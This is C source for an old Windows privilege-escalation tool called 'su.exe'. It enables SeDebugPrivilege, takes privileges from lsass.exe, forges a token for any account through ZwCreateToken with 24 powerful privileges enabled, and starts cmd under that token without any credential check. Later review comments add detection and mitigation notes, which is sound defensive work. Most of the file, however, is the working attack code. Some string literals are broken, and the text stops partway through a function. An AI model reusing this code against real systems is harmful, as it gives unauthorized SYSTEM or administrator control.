/**//* su切换用户
* 2004/12/28 1.0,发现Bingle的wsu是假冒令牌,权限并没有真正设置.
* 2004/12/29 2.0,真正实现模拟用户令牌的动作.
* 2004/12/29 3.0,即使帐号禁止也可以模拟用户
* 2004/12/30 4.0, 可以模拟SYSTEM用户,权限24个,全部默认开放
* 2004/12/30 4.1 终端登陆用户可以获取管理员组/SYSTEM权限.普通用户失败.
*/
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <lm.h>
#include <Ntsecapi.h>
#include <Accctrl.h>
#include <Aclapi.h>
#include <Tlhelp32.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"Advapi32")
#pragma comment(lib,"User32")
#pragma comment(lib,"Netapi32")
#define SIZE 1024       /* size of the fixed local string buffers (StringSid / UserDefaultGroup in NtCreateTokenAsuser) */
#define VERSION "4.1"   /* printed in main()'s banner */

#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)   /* NTSTATUS success code; not referenced in the visible part of the file */
/* Full-control masks for window-station and desktop objects (specific rights
 * plus the standard DELETE/READ_CONTROL/WRITE_DAC/WRITE_OWNER rights).  Not
 * referenced in the visible chunk; presumably used where the tool re-ACLs the
 * interactive window station/desktop (AddUserPrivToHandle, and the
 * hwinsta/hdesk locals of NtCreateTokenAsuser) — confirm beyond this chunk. */
#define WINSTA_ALL (WINSTA_ACCESSCLIPBOARD|WINSTA_ACCESSGLOBALATOMS|WINSTA_CREATEDESKTOP| WINSTA_ENUMDESKTOPS|WINSTA_ENUMERATE|WINSTA_EXITWINDOWS|WINSTA_READATTRIBUTES | WINSTA_READSCREEN|WINSTA_WRITEATTRIBUTES|DELETE|READ_CONTROL| WRITE_DAC|WRITE_OWNER)
#define DESKTOP_ALL (DESKTOP_CREATEMENU|DESKTOP_CREATEWINDOW|DESKTOP_ENUMERATE|DESKTOP_HOOKCONTROL|DESKTOP_JOURNALPLAYBACK|DESKTOP_JOURNALRECORD|DESKTOP_READOBJECTS | DESKTOP_SWITCHDESKTOP|DESKTOP_WRITEOBJECTS|DELETE|READ_CONTROL| WRITE_DAC|WRITE_OWNER)
#define GENERIC_ACCESS (GENERIC_READ|GENERIC_WRITE|GENERIC_EXECUTE|GENERIC_ALL)   /* every generic right; not referenced in this chunk */
/* SID attribute flag defined locally (same value as the SDK's SE_GROUP_RESOURCE);
 * not referenced in this chunk */
#define SE_GROUP_RESOURCE (0x20000000L)
/*
 * Local copy of the native OBJECT_ATTRIBUTES structure, passed as the third
 * argument of the PNtCreateToken call.  NtCreateTokenAsuser initialises one
 * with Length = sizeof, no root directory or name, Attributes 0, no security
 * descriptor and a pointer to a SECURITY_QUALITY_OF_SERVICE.
 * NOTE(review): current SDKs declare the same tag in winternl.h / ntdef.h;
 * including either next to this file would redefine it.
 */
typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;                    /* sizeof(OBJECT_ATTRIBUTES) */
    HANDLE RootDirectory;            /* NULL here */
    PUNICODE_STRING ObjectName;      /* NULL here (tokens are unnamed) */
    ULONG Attributes;                /* 0 here */
    PVOID SecurityDescriptor;        /* NULL here */
    PVOID SecurityQualityOfService;  /* -> SECURITY_QUALITY_OF_SERVICE (impersonation level etc.) */
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
/*
 * Local copy of the LSA authentication-package token-information selector.
 * Not referenced anywhere in the visible part of the file.
 */
typedef enum _LSA_TOKEN_INFORMATION_TYPE
{
    LsaTokenInformationNull, // Implies LSA_TOKEN_INFORMATION_NULL data type
    LsaTokenInformationV1, // Implies LSA_TOKEN_INFORMATION_V1 data type
    LsaTokenInformationV2 // Implies LSA_TOKEN_INFORMATION_V2 data type
} LSA_TOKEN_INFORMATION_TYPE, *PLSA_TOKEN_INFORMATION_TYPE;
/*
 * Local copy of the LSA "null" token-information block (expiry + groups).
 * Not referenced anywhere in the visible part of the file.
 */
typedef struct _LSA_TOKEN_INFORMATION_NULL
{
    LARGE_INTEGER ExpirationTime;
    PTOKEN_GROUPS Groups;
} LSA_TOKEN_INFORMATION_NULL, *PLSA_TOKEN_INFORMATION_NULL;
/*
 * Function-pointer type for the native NtCreateToken / ZwCreateToken export;
 * NtCreateTokenAsuser resolves "ZwCreateToken" from ntdll through it.
 *
 * The call synthesises a token entirely from caller-supplied data (user,
 * groups, privileges, owner, primary group, default DACL, source) — no
 * credential of the account is involved.  Calling it requires
 * SeCreateTokenPrivilege, which by default only LSASS holds; that is
 * presumably why main() first reaches into lsass.exe (GrantPrivFromLsass,
 * not visible in this chunk).  Restricting SeDebugPrivilege and protecting
 * LSASS are the corresponding mitigations.
 *
 * NOTE(review): declared without the NTAPI/WINAPI calling-convention
 * specifier.  On a 32-bit build this only works if the project's default
 * calling convention matches the export's __stdcall; otherwise the
 * 13-argument call corrupts the caller's stack — confirm the build settings.
 */
typedef NTSTATUS (*PNtCreateToken)(
    PHANDLE TokenHandle,                  /* out: the new token */
    ACCESS_MASK DesiredAccess,            /* TOKEN_ALL_ACCESS in NtCreateTokenAsuser */
    POBJECT_ATTRIBUTES ObjectAttributes,  /* see OBJECT_ATTRIBUTES above */
    TOKEN_TYPE TokenType,                 /* TokenPrimary in NtCreateTokenAsuser */
    PLUID AuthenticationId,               /* logon session id */
    PLARGE_INTEGER ExpirationTime,
    PTOKEN_USER TokenUser,
    PTOKEN_GROUPS TokenGroups,
    PTOKEN_PRIVILEGES TokenPrivileges,    /* built by MakeAdminPriv() */
    PTOKEN_OWNER TokenOwner,
    PTOKEN_PRIMARY_GROUP TokenPrimaryGroup,
    PTOKEN_DEFAULT_DACL TokenDefaultDacl,
    PTOKEN_SOURCE TokenSource
    );
/*
 * Local copy of Userenv's PROFILEINFO (ANSI layout), used with the
 * dynamically resolved LoadUserProfileA / UnloadUserProfile.
 * NOTE(review): main() declares one and passes it to LoadUserProfile without
 * setting dwSize or lpUserName (both documented as required by that API).
 */
typedef struct _PROFILEINFO
{
    DWORD dwSize;           /* must be sizeof(PROFILEINFO) — never set in main() */
    DWORD dwFlags;
    LPTSTR lpUserName;      /* required by LoadUserProfile — never set in main() */
    LPTSTR lpProfilePath;
    LPTSTR lpDefaultPath;
    LPTSTR lpServerName;
    LPTSTR lpPolicyPath;
    HANDLE hProfile;        /* filled by LoadUserProfile; main() hands it to UnloadUserProfile */
} PROFILEINFO, *LPPROFILEINFO;
/*
 * Function-pointer types for the two Userenv.dll exports that main() resolves
 * with GetProcAddress ("LoadUserProfileA", "UnloadUserProfile") instead of
 * linking Userenv.lib.
 * NOTE(review): neither carries the WINAPI calling-convention specifier; on a
 * 32-bit build confirm the project's default convention is __stdcall.
 */
typedef BOOL (*PLoadUserProfile)(
    HANDLE hToken, // user token
    LPPROFILEINFO lpProfileInfo // profile
    );

typedef BOOL (*PUnloadUserProfile)(
    HANDLE hToken, // user token
    HANDLE hProfile // handle to registry key
    );
/* Process-wide state, set from the command line or during setup in main(). */
BOOL cback = 0;               /* not referenced in the visible part of the file */
char *system_user = NULL;     /* target account name from "-u"; main() exits if it is unset */
int lsasspid = 0;             /* PID of lsass.exe, found via GetPidOfProcess() in main() */
unsigned int DebugLevel = 7;  /* set by "-D".  Despite the name, the visible uses
                                 (compared against 7 and printed as "Using DebugLevel 0x%x"
                                 next to the group-attribute comments in NtCreateTokenAsuser)
                                 suggest it is the SID attribute mask applied to token groups —
                                 confirm in the part of that function beyond this chunk */
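/* function prototypes begin */
void usage(char *s);
/* NOTE(review): declared with an empty parameter list but called as
 * GrantPriv("SeDebugPrivilege") in main(); the definition is not in this
 * chunk, so the declaration is left unprototyped rather than guessed. */
int GrantPriv();
HANDLE CreateTokenAsUser(char *user);
/* NOTE(review): same name as the Win32 API in sddl.h; a collision if that
 * header is ever included. */
BOOL ConvertSidToStringSid(PSID pSid,LPTSTR TextualSid, LPDWORD lpdwBufferLen);
/* NOTE(review): groupcount is int*, but NtCreateTokenAsuser passes the
 * address of a DWORD (GroupCount) — an incompatible-pointer mismatch. */
BOOL GetUserGroup(char *username,char ***name,int *groupcount);
PSID GetUserSid(char *LookupUser);
HANDLE NtCreateTokenAsuser(char *user);
int GrantPrivFromLsass(int pid);
/* Added: GetPidOfProcess is defined after main() but called from it; without a
 * declaration the call relied on an implicit int declaration, invalid since C99. */
int GetPidOfProcess(char *exe);
void *GetFromToken(HANDLE hToken, TOKEN_INFORMATION_CLASS tic);
void pfree(void *p);
LUID GetLuidFromText(char *s);
TOKEN_PRIVILEGES *MakeAdminPriv();
BOOL AddUserPrivToHandle(HANDLE Hhandle,char *s,ACCESS_MODE mode);
/* function prototypes end */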
/*
 * main - entry point of the "su" tool.
 *
 * Arguments parsed here: "-u <account>" (required; stored in system_user) and
 * "-D <n>" (stored in DebugLevel).  "-h" as the first argument prints usage.
 *
 * Flow (each step prints a "[+]"/"[-]" progress line):
 *   1. load Userenv.dll and resolve LoadUserProfileA / UnloadUserProfile;
 *   2. WSAStartup (no socket use is visible in this chunk);
 *   3. GrantPriv("SeDebugPrivilege")  — defined elsewhere; < 0 means failure;
 *   4. GetPidOfProcess("lsass.exe"), then GrantPrivFromLsass(pid) — defined
 *      elsewhere; 0 means success here, the opposite convention to GrantPriv.
 *      Its name and the file's changelog suggest it copies privileges out of
 *      the LSASS process; not verifiable from this chunk;
 *   5. NtCreateTokenAsuser(system_user) forges a primary token for the
 *      account, "cmd" is started under it with CreateProcessAsUser, and the
 *      tool blocks until that process exits.
 *
 * Security review: no credential of the target account is ever checked, so
 * this is a privilege-escalation utility rather than an su replacement.
 * Signals a defender can key on: an interactive user process enabling
 * SeDebugPrivilege and opening lsass.exe (steps 3-4), ZwCreateToken being
 * resolved from ntdll outside LSASS (step 5), and cmd.exe created through
 * CreateProcessAsUser by a non-service process (process-creation auditing
 * with command-line capture).  Mitigations: do not grant SeDebugPrivilege to
 * ordinary accounts (steps 3-4 depend on it) and run LSASS as a protected
 * process so user-mode code cannot read from it.
 *
 * Returns -1 on argument or setup failure; otherwise exit(0) is called —
 * including on CreateProcessAsUser failure, so the exit status never
 * reflects an error there.
 *
 * NOTE(review): GetLastError() returns a DWORD but is printed with %d
 * throughout; %lu is the matching specifier.  Three progress strings below
 * are split across lines in this capture (an unterminated literal as shown);
 * the source presumably had a single "..." string — restore before building.
 */
int main(int argc,char **argv)
{
    int i;
    WSADATA wsd;
    HANDLE NewToken;
    PLoadUserProfile LoadUserProfile;
    PUnloadUserProfile UnloadUserProfile;
    HMODULE UserenvModule;

    printf( "su.exe like unix su tool,version %s \n"
        "by bkbll (bkbll#cnhonker.net) http://www.cnhonker.com\n\n",VERSION);

    if((argc>1) && (strnicmp(argv[1],"-h",2) == 0))
    {
        usage(argv[0]);
        return -1;
    }
    // Options come in "-x value" pairs.
    // NOTE(review): argv[i+1] is read without checking i+1 < argc, so a
    // trailing "-u" or "-D" reads past the argument vector; flags other than
    // u/D are silently ignored (no default case).
    for(i=1;i<argc;i+=2)
    {
        if(strlen(argv[i]) != 2)
        {
            usage(argv[0]);
            return -1;
        }
        switch(argv[i][1])
        {
        case 'u':
            system_user = argv[i+1];
            break;
        case 'D':
            DebugLevel = atoi(argv[i+1]);
            break;

        }
    }
    if(system_user == NULL)
    {
        usage(argv[0]);
        return -1;
    }
    // Userenv.dll is loaded at run time; the handle is never released with
    // FreeLibrary (process exit reclaims it).
    UserenvModule = LoadLibrary("Userenv.dll");
    if(UserenvModule == NULL )
    {
        printf("[-] GetModuleHandle Userenv error:%d\n",GetLastError());
        return -1;
    }
    LoadUserProfile = (PLoadUserProfile) GetProcAddress(UserenvModule,"LoadUserProfileA");
    if(LoadUserProfile == NULL)
    {
        printf("[-] GetProcAddress LoadUserProfile error:%d\n",GetLastError());
        return -1;
    }

    UnloadUserProfile = (PUnloadUserProfile) GetProcAddress(UserenvModule,"UnloadUserProfile");
    if(UnloadUserProfile == NULL)
    {
        printf("[-] GetProcAddress UnloadUserProfile error:%d\n",GetLastError());
        return -1;
    }

    // Winsock is initialised but nothing in this chunk uses a socket.
    if (WSAStartup(MAKEWORD(2,2), &wsd) != 0)
    {
        printf("[-] WSAStartup error:%d\n", WSAGetLastError());
        return -1;
    }
    // First build a token; this assumes the current user is an administrator.
    // Raise our own privileges first.
    printf("[+] Enable SeDebugPrivilege..\n");
    if(GrantPriv("SeDebugPrivilege") < 0)
        return -1;
    printf("[+] Get Lsass.exe Pid
.");
    fflush(NULL);
    // GetPidOfProcess returns -1 when the snapshot fails or no match is found.
    lsasspid = GetPidOfProcess("lsass.exe");
    if(lsasspid == -1)
    {
        printf("Get Pid of services failed\n");
        return -1;
    }
    printf("%d\n",lsasspid);
    // Inherit privileges from lsass (body not in this chunk; 0 == success).
    printf("[+] GrantPrivilege From Lsass
.\n");
    if(GrantPrivFromLsass(lsasspid) == 0)
    {
        // Build a token
        //NewToken = CreateTokenAsUser(system_user);
        printf("[+] Calling NtCreateTokenAsuser
\n");
        NewToken = NtCreateTokenAsuser(system_user);
        if(NewToken != INVALID_HANDLE_VALUE)
        {
            STARTUPINFO si;
            PROCESS_INFORMATION pi;
            PROFILEINFO ProfileInfo;

            printf("[+] CreateProcess By that Token
\n");
            fflush(stdout);
            // No visible reason for the delay; presumably to let the
            // progress output land before the child starts.
            Sleep(1000);
            // NOTE(review): ProfileInfo is passed uninitialised — dwSize and
            // lpUserName are never set — and the return value is not checked;
            // ProfileInfo.hProfile is handed to UnloadUserProfile regardless.
            LoadUserProfile(NewToken,&ProfileInfo);

            ZeroMemory( &si, sizeof(si) );
            si.cb = sizeof(si);
            //si.lpDesktop = TEXT("winstaABC\\testdesktop");
            ZeroMemory( &pi, sizeof(pi) );
            // bInheritHandles is TRUE although the comment beside it says FALSE.
            if( !CreateProcessAsUser( NewToken,
                NULL, // No module name (use command line).
                "cmd", // Command line.
                NULL, // Process handle not inheritable.
                NULL, // Thread handle not inheritable.
                TRUE, // Set handle inheritance to FALSE.
                0, // No creation flags.
                NULL, // Use parent's environment block.
                NULL, // Use parent's starting directory.
                &si, // Pointer to STARTUPINFO structure.
                &pi ) // Pointer to PROCESS_INFORMATION structure.
            )
            {
                // Exits with status 0 on failure; NewToken and the loaded
                // profile are left for process teardown.
                printf( "CreateProcessAsuser failed:%d.",GetLastError());
                exit(0);
            }

            // Wait until child process exits.
            WaitForSingleObject( pi.hProcess, INFINITE );
            // Close process and thread handles.
            CloseHandle( pi.hProcess );
            CloseHandle( pi.hThread );
            printf("[-] Process exited.\n");
            UnloadUserProfile(NewToken,ProfileInfo.hProfile);
            CloseHandle(NewToken);
            // Create the process with this token
        }
    }
    WSACleanup();
    exit(0);
}
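// Get the PID of the named executable
/*
 * GetPidOfProcess - return the PID of the first running process whose image
 * name equals `exe` (case-insensitive), using a ToolHelp process snapshot.
 *
 * Returns the PID, or -1 when the snapshot cannot be taken (error printed)
 * or no process matches.  main() uses it to locate lsass.exe; a
 * non-service process enumerating for lsass.exe is itself a useful
 * detection hint.
 *
 * Fixes vs. the original: the snapshot handle leaked on the Process32First
 * failure path (every path now closes it); the unused bRet local is gone;
 * GetLastError() (DWORD) is printed with %lu instead of %d.
 */
int GetPidOfProcess(char *exe)
{
    HANDLE hProcessSnap;
    PROCESSENTRY32 pe32;
    int pid = -1;

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
    {
        printf("CreateToolhelp32Snapshot Failed:%lu\n",GetLastError());
        return pid;
    }
    //copy from MSDN
    memset(&pe32,0,sizeof(pe32));
    pe32.dwSize = sizeof(pe32);   /* required by Process32First */
    if (Process32First(hProcessSnap, &pe32))
    {
        do
        {
            if(stricmp(pe32.szExeFile,exe) == 0)
            {
                pid = (int) pe32.th32ProcessID;
                break;
            }
        } while(Process32Next(hProcessSnap, &pe32));
    }
    // Do not forget to clean up the snapshot object (on every path).
    CloseHandle(hProcessSnap);
    return pid;
}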
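// Return the SID for the named user/group
/*
 * GetUserSid - resolve an account or group name to its SID with
 * LookupAccountName (size query first, then the filling call).
 *
 * Returns a malloc()'d SID that the caller must free(), or NULL after
 * printing an error.  The referenced-domain name is fetched only because
 * the API requires a buffer for it and is discarded.
 *
 * Fixes vs. the original: the SID and domain buffers leaked when the second
 * LookupAccountName failed, and the SID leaked when the domain allocation
 * failed; the unused `i` is gone; error codes are printed with %lu (DWORD).
 * Error paths free() directly because the memory came from malloc() here;
 * the success path keeps the file's pfree() helper (defined elsewhere).
 */
PSID GetUserSid(char *LookupUser)
{
    SID *GroupSid = NULL;
    char *DomainName = NULL;
    DWORD cbSid = 0, cbDomainName = 0;
    SID_NAME_USE peUse;
    DWORD ErrorCode;

    /* Size query: expected to fail with ERROR_INSUFFICIENT_BUFFER (122),
     * leaving the required sizes in cbSid / cbDomainName. */
    LookupAccountName(NULL,LookupUser,NULL,&cbSid,NULL,&cbDomainName,&peUse);
    ErrorCode = GetLastError();
    if(ErrorCode != ERROR_INSUFFICIENT_BUFFER) //122
    {
        printf("LookupAccountName in GetUserSid(\"%s\") Failed:%lu\n",LookupUser,ErrorCode);
        return NULL;
    }
    GroupSid = (SID *) malloc(cbSid + 1);
    DomainName = (char*) malloc(cbDomainName + 1);
    if((GroupSid == NULL) || (DomainName == NULL))
    {
        printf("Malloc failed:%lu\n",GetLastError());
        goto fail;
    }
    memset(GroupSid,0,cbSid + 1);
    memset(DomainName,0,cbDomainName + 1);
    if(!LookupAccountName(NULL,LookupUser,GroupSid,&cbSid,DomainName,&cbDomainName,&peUse))
    {
        printf("LookupAccountName GetUserSid(\"%s\") After Malloc Failed:%lu\n",LookupUser,GetLastError());
        goto fail;
    }
    pfree(DomainName);
    return GroupSid;   /* ownership passes to the caller */

fail:
    free(DomainName);  /* free(NULL) is a no-op */
    free(GroupSid);
    return NULL;
}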
// Build the privilege set shared by Administrators and SYSTEM
/*
 * MakeAdminPriv - build the TOKEN_PRIVILEGES block handed to the native
 * token-creation call: 24 privileges, each with Attributes = 3, i.e.
 * SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED.
 *
 * Returns a malloc()'d block the caller must free(), or NULL (message
 * printed) when the allocation fails.  GetLuidFromText() is defined
 * elsewhere in the file; whatever it returns for an unknown name is stored
 * unchecked.
 *
 * Security review: the set is hard-coded and independent of the account's
 * assigned user rights (it includes SeTcb, SeCreateToken, SeDebug,
 * SeBackup/SeRestore, SeLoadDriver, SeAssignPrimaryToken ...).  A process
 * whose token carries these enabled for a non-SYSTEM account is a strong
 * anomaly: compare a process's token privileges against the user-rights
 * assignment policy rather than trusting the token itself.
 *
 * NOTE(review): the buffer size 4 + (3*4)*24 + 4 is hand-computed
 * (DWORD PrivilegeCount + 24 x 12-byte LUID_AND_ATTRIBUTES, plus 4 spare);
 * a sizeof-based expression would be the portable form.  The failure
 * message names NtCreateTokenAsuser although this is MakeAdminPriv.
 */
TOKEN_PRIVILEGES *MakeAdminPriv()
{
    TOKEN_PRIVILEGES *token_privileges;
    DWORD i,PrivilegeCount;

    i = 0;
    PrivilegeCount = 24;
    token_privileges = (PTOKEN_PRIVILEGES) malloc(4 + (3*4)*PrivilegeCount + 4);
    if(token_privileges == NULL)
    {
        printf("malloc failed for PTOKEN_PRIVILEGES in NtCreateTokenAsuser\n");
        return NULL;
    }
    token_privileges->PrivilegeCount = PrivilegeCount;
    // Every entry: Attributes 3 = enabled-by-default | enabled.
    //0
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeTcbPrivilege");
    //1
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeCreateTokenPrivilege");
    //2
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeTakeOwnershipPrivilege");
    //3
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeCreatePagefilePrivilege");
    //4
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeLockMemoryPrivilege");
    //5
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeAssignPrimaryTokenPrivilege");
    //6
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeIncreaseQuotaPrivilege");
    //7
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeIncreaseBasePriorityPrivilege");
    //8
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeCreatePermanentPrivilege");
    //9
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeDebugPrivilege");
    //10
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeAuditPrivilege");
    //11
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeSecurityPrivilege");
    //12
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeSystemEnvironmentPrivilege");
    //13
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeChangeNotifyPrivilege");
    //14
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeBackupPrivilege");
    //15
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeRestorePrivilege");
    //16
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeShutdownPrivilege");
    //17
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeLoadDriverPrivilege");
    //18
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeProfileSingleProcessPrivilege");
    //19
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeSystemtimePrivilege");
    //20
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeUndockPrivilege");
    //21
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeManageVolumePrivilege");
    //22
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeImpersonatePrivilege");
    //23
    token_privileges->Privileges[i].Attributes = 3;
    token_privileges->Privileges[i++].Luid = GetLuidFromText("SeCreateGlobalPrivilege");

    return token_privileges;

}
// Add a user to a handle's DACL
/*
 * AddUserPrivToHandle - grant account `s` the access rights `mode` on the
 * user object (window station / desktop — GetUserObjectSecurity is the
 * accessor used) behind `Hhandle`, by adding an explicit GRANT ACE to the
 * object's existing DACL.
 *
 * Steps: read the DACL-only self-relative security descriptor (size query,
 * then fill); extract the current DACL; build one EXPLICIT_ACCESS for `s`
 * and merge it with SetEntriesInAcl; convert the descriptor to absolute
 * form (MakeAbsoluteSD, again size query then fill); install the merged
 * DACL; validate; write back with SetUserObjectSecurity.
 *
 * Returns TRUE on success, FALSE after printing an error.  Presumably called
 * on the hwinsta/hdesk handles declared in NtCreateTokenAsuser so that a
 * process under the forged token can use the interactive desktop — confirm
 * in the part of that function beyond this chunk.  A widened DACL on the
 * interactive window station or desktop is a durable, inspectable change a
 * defender can check for.
 *
 * NOTE(review), correctness:
 *  - every early-return path leaks pSD, PNewAcl, pSecurityDescriptor1 and
 *    the four absolute-SD buffers;
 *  - POldAcl points inside pSD (GetSecurityDescriptorDacl returns a pointer
 *    into the descriptor, not a separate allocation), so LocalFree(POldAcl)
 *    at the end passes a non-LocalAlloc pointer;
 *  - the second GetUserObjectSecurity failure prints the stale ErrorCode
 *    rather than GetLastError();
 *  - pSecurityDescriptor1 is fixed at 0x400 bytes before the size query and
 *    is not re-allocated if dwAbsoluteSDSize comes back larger;
 *  - size1 and OldAcl are unused; GetLastError() (DWORD) is printed with %d;
 *  - the final error message says SetKernelObjectSecurity but the call is
 *    SetUserObjectSecurity.
 */
BOOL AddUserPrivToHandle(HANDLE Hhandle,char *s,ACCESS_MODE mode)
{
    PSECURITY_DESCRIPTOR pSecurityDescriptor1,pSD = NULL;
    DWORD size,size1,len,ErrorCode,DaclPresent,DaclDefaulted,dwAbsoluteSDSize,dwDaclSize,dwSaclSize,dwOwnerSize,dwPrimaryGroupSize;
    ACL OldAcl;
    PACL POldAcl,PNewAcl,pDacl,pSacl;
    PSID pOwner,pPrimaryGroup;
    EXPLICIT_ACCESS ExplicitAccess1;
    SECURITY_INFORMATION sinfo;

    dwAbsoluteSDSize = dwDaclSize = dwSaclSize = dwOwnerSize = dwPrimaryGroupSize = 0;

    size = 0;
    sinfo = DACL_SECURITY_INFORMATION;   /* only the DACL is read and written */
    // Fetch the SECURITY_DESCRIPTOR: size query with a NULL buffer first.
    GetUserObjectSecurity(Hhandle,&sinfo,pSD,size,&len);
    ErrorCode = GetLastError();
    if(ErrorCode == ERROR_INSUFFICIENT_BUFFER) //122
    {
        pSD = (PSECURITY_DESCRIPTOR) malloc(len + 1);
        if(pSD == NULL)
        {
            printf("Malloc failed:%d\n",GetLastError());
            return FALSE;
        }
        memset(pSD,0,len + 1);
        size = len;
    }
    else
    {
        printf("GetUserObjectSecurity in AddUserPrivToHandle(\"%s\") Failed:%d\n",s,ErrorCode);
        return FALSE;
    }
    // Second call fills the self-relative descriptor.
    if(!GetUserObjectSecurity(Hhandle,&sinfo,pSD,size,&len))
    {
        printf("GetUserObjectSecurity in AddUserPrivToHandle(\"%s\") Failed:%d\n",s,ErrorCode);
        return FALSE;
    }
    // Fetch the DACL (POldAcl points into pSD).
    POldAcl = NULL;
    if(!GetSecurityDescriptorDacl(pSD,&DaclPresent,&POldAcl,&DaclDefaulted))
    {
        printf("GetSecurityDescriptorDacl Error:%d\n",GetLastError());
        return FALSE;
    }
    // Build one new ACE and merge it with the existing DACL below.  (The
    // original comment spoke of giving the administrators group full rights;
    // the entry is actually built for `s` with the caller's `mode`.)
    memset(&ExplicitAccess1,0,sizeof(ExplicitAccess1));
    BuildExplicitAccessWithName(&ExplicitAccess1,s,mode,GRANT_ACCESS,NO_INHERITANCE);
    // Merge: PNewAcl is LocalAlloc'd by SetEntriesInAcl.
    ErrorCode = SetEntriesInAcl(1,&ExplicitAccess1,POldAcl,&PNewAcl);
    if(ErrorCode != ERROR_SUCCESS)
    {
        printf("SetEntriesInAcl Error:%d\n",ErrorCode);
        return FALSE;
    }

    // Absolute-SD buffer is a fixed 0x400 bytes; the other four buffers are
    // sized by the query call that follows.
    dwAbsoluteSDSize = 0x400;
    pSecurityDescriptor1 = (PSECURITY_DESCRIPTOR) malloc(dwAbsoluteSDSize+1);
    if(pSecurityDescriptor1 == NULL)
    {
        printf("Malloc for MakeAbsoluteSD failed:%d\n",GetLastError());
        return FALSE;
    }
    memset(pSecurityDescriptor1,0,dwAbsoluteSDSize+1);

    MakeAbsoluteSD( pSD,
        pSecurityDescriptor1,
        &dwAbsoluteSDSize,
        NULL,
        &dwDaclSize,
        NULL,
        &dwSaclSize,
        NULL,
        &dwOwnerSize,
        NULL,
        &dwPrimaryGroupSize);
    // Size query first: expected to fail with ERROR_INSUFFICIENT_BUFFER.
    ErrorCode = GetLastError();

    if(ErrorCode == ERROR_INSUFFICIENT_BUFFER)
    {
        // Allocate
        //printf("requested sizes:\ndwDaclSize=%d\ndwSaclSize=%d\ndwOwnerSize=%d\ndwPrimaryGroupSize=%d\ndwAbsoluteSDSize=%d\n",
        // dwDaclSize,dwSaclSize,dwOwnerSize,dwPrimaryGroupSize,dwAbsoluteSDSize);
        //
        //pSecurityDescriptor1 = (PSECURITY_DESCRIPTOR) malloc(dwAbsoluteSDSize+1);
        pDacl = (PACL) malloc(dwDaclSize+1);
        pSacl = (PACL) malloc(dwSaclSize+1);
        pOwner = (PSID) malloc(dwOwnerSize+1);
        pPrimaryGroup = (PSID) malloc(dwPrimaryGroupSize+1);

        if( //(pSecurityDescriptor1 == NULL) ||
            (pDacl == NULL) ||
            (pSacl == NULL) ||
            (pOwner == NULL) ||
            (pPrimaryGroup == NULL))
        {
            printf("Malloc for MakeAbsoluteSD failed:%d\n",GetLastError());
            return FALSE;
        }
        //memset(pSecurityDescriptor1,0,dwAbsoluteSDSize+1);
    }
    else
    {
        printf("MakeAbsoluteSD Error:%d\n",GetLastError());
        return FALSE;
    }
    // With the buffers allocated the conversion can succeed.
    if(!MakeAbsoluteSD(pSD,
        pSecurityDescriptor1,
        &dwAbsoluteSDSize,
        pDacl,
        &dwDaclSize,
        pSacl,
        &dwSaclSize,
        pOwner,
        &dwOwnerSize,
        pPrimaryGroup,
        &dwPrimaryGroupSize))
    {
        printf("MakeAbsoluteSD After Malloc Error:%d\n",GetLastError());
        return FALSE;
    }
    //printf("actual sizes:\ndwDaclSize=%d\ndwSaclSize=%d\ndwOwnerSize=%d\ndwPrimaryGroupSize=%d\ndwAbsoluteSDSize=%d\n",
    // dwDaclSize,dwSaclSize,dwOwnerSize,dwPrimaryGroupSize,size1);
    // Install the merged DACL, keeping the original present/defaulted flags.
    if(!SetSecurityDescriptorDacl(pSecurityDescriptor1,DaclPresent,PNewAcl,DaclDefaulted))
    {
        printf("SetSecurityDescriptorDacl Error:%d\n",GetLastError());
        return FALSE;
    }
    // Validate the new security descriptor
    if(!IsValidSecurityDescriptor(pSecurityDescriptor1))
    {
        printf("pSecurityDescriptor1 is not a valid SD:%d\n",GetLastError());
        return FALSE;
    }

    // Apply the new DACL to the handle
